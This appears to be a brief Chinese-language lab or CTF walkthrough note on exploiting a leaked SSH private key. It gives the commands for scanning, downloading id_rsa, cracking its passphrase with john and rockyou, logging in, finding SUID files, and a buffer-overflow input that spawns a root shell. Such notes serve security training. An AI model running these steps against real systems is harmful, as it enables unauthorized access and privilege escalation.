持续更新
1.SSH私钥泄露
nmap -sV -n -v -p -oX
dirb url
发现:robot.txt
浏览查找敏感信息
下载id_rsa \ authoriazed_keys
可发现目标用户名
ssh -i id_rsa username@IP
chmod 600 id_rsa
ssh2john id_rsa > rsacreack
zcat rockyou.gz | john --pipe --rules rsacrack
发在ssh密码,登录
cd /root
ls
cat read_message.c
查找系统中具有root权限的文件:find / -perm 4000 2>/dev/null
发现:
利用漏出漏洞:SimonAAAAAAAAAAAAA/bin/sh
获得root权限